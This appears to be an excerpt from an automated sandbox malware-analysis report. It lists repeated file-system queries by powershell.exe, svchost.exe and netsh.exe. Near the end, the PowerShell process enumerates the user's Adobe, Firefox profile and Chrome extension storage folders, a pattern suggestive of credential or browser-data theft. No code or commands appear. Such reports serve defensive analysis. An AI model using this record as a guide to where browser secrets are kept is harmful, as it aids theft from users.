      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Forms VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\CRLogs VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Sonar\SonarCC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Network VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Network\Connections VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Application Data VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm VolumeInformation
